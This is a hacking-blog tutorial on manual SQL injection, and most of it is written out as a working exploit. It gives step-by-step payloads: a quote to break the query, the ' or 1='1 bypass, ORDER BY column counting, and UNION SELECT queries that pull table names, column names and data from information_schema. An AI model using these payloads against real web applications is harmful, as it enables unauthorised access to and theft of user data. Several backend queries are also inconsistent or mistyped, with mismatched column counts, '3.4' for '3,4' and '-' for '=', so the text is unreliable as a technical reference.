Hello Guys! You’re warm welcome in this advance hacking blog. We have learned various Topics about CyberSecurity from here, but that is no end. again, we are going to make this post also interesting one of them. Now today I came here to share about How to perform Manual SQL injection?


How to perform Manual SQL Injection Exploitation ?

What is SQL injection (SQLi)?

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. 

This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior.


What is SQL injection (SQLi)?



In some situations, an attacker can escalate an SQL injection attack to compromise the underlying server or other back-end infrastructure or perform a denial-of-service attack.

Disclaimer! This Post does not Promote or encourage Any illegal activities, all contents provided by This Website is meant for EDUCATIONAL PURPOSE only.


READ MORE: 

How to perform Manual sql injection?

Here, are some steps to perform Manual sql injection. so, step by step follow me-

Pre-requisites:

  1. Knowledge of SQL (Structured Query Language), basics (CREATE, READ, UPDATE, DELETE)
  2. Backend Technologies (PHP, JSP, etc.) 
  3. Web application basics

Working Methodology


Application says: 

    Enter a User ID - 


Backend Query:

SELECT first name, last name FROM users WHERE user_id - '$id';

User Input: 1

Backend Query:

SELECT first name, last_name FROM users WHERE user_id = '1';

STEP1: Now use the error base technique by adding an apostrophe (‘) symbol at the end of input which will try to break the query.

User Input: 1'

Backend Query: 

SELECT first name, last name FROM users WHERE user_id = '1'';

Now, you can see we have got an error message which means the running site is infected by SQL injection.

Malicious User Input: 

1' or 1='1


Backend Query:

SELECT first_name, last_name FROM users WHERE user_id= '1' or 1 ='1'

 OR  

Malicious User Input:

 1' or 1=1#


Backend Query:

SELECT first_name, last_name FROM users WHERE user_id= '1' or 1 = 1#

Finding Number of Columns in the Current Tables-

STEP2: Now, using the ORDER BY keyword to sort the records in ascending or descending order for id=1

Malicious User Input:

1' ORDER BY 1,2,3,4,5,6,7,8#


Backend Query: 

SELECT first_name, last_name FROM users WHERE user_id = '1' ORDER BY 1,2,3,4,5,6,7,8#;

Now, You can see we have got an error at the order by 9 which means it consists only 8 records.

Finding reflections of output-

STEP3: Now, It is showing the result of the reflecting on the output screen also.

Malicious User Input: 

1' UNION SELECT 1,2,3,4,5,6,7,8#


Backend Query:

SELECT first_name, last_name FROM users WHERE user_id = '1' UNION SELECT 1,2,3,4,5,5,7,8#; 

Extracting sensitive information-

Common commands: 

version() - This will return the SQL version that is running on your server.

user () - This will return the current user name and host name for the MySQL connection.

database() - This will returns the name of the current database.

STEP4: Now, the next query, we will try to fetch table name inside the database(information_schema.tables).

   (a) List Table names:

1' UNION SELECT 1,table_name,3,4,5,6,7,8 from information_schema.tables#


       Backend Query: 

       SELECT first_name, last_name FROM users WHERE user_id = 1 UNION SELECT 1,                           table_name, 3,4,5,5,7,8 from Information_schema.tables#;

STEP5: After that, we will try to fetch column name inside the database(information_schema.tables).

   (b) List columns name:

1' UNION SELECT 1, column_name, 3.4,5,6,7,8 from information_schema.columns where table_name= $TABLE_NAME$#


        Backend Query: 

        SELECT first name, last name FROM users WHERE user_id = 1' UNION SELECT 1,column_name,3,4,5,6,7,8 from information_schema.columns where table_name=$TABLE_NAME$#;


STEP6: Now, Again we will try to fetch information of column name from the selected table name inside the database.

Extract data off columns:

 1' UNION SELECT 1, $COLUMN_NAME1, $COLUMN_NAME2,4,5,6,7,8 from $TABLE_NAME$#


Backend Query:

SELECT First_name, Last_name FROM users WHERE user_id = '1' UNION SELECT 1, $COLUMN_NAME1, $COLUMN_NAME2,4,5,6,7,6,7,8 from $TABLE_NAME$#;


STEP7: Now, This is an Optional Step, but you can use concat function. It is used for concatenation of two or more strings into a single string.

Concatination of Columns Data (Optional):

1' UNION SELECT 1, concat($COLUMN_NAME1$,'$SEPARATORS$', $COLUMN_NAME2$),4,5,6,7,8 from $TABLE_NAME$#;


Backend Query:

SELECT First_name, Last_name FROM users WHERE user_id = '1' UNION SELECT 1, concat($COLUMN_NAME1$,'$SEPARATORS$',$COLUMN_NAME2$,4,5,6,7,6,7,8 from $TABLE_NAME$#;


LAST WORD: In today's post, we learned How to perform Manual sql injection? This is the end of the article. We will meet soon with a new interesting article. I hope you like this. 

So, stay tuned with us as always. if you have any special query, you can send an email or you can join us on social media to ask the problems.

Previous Post Next Post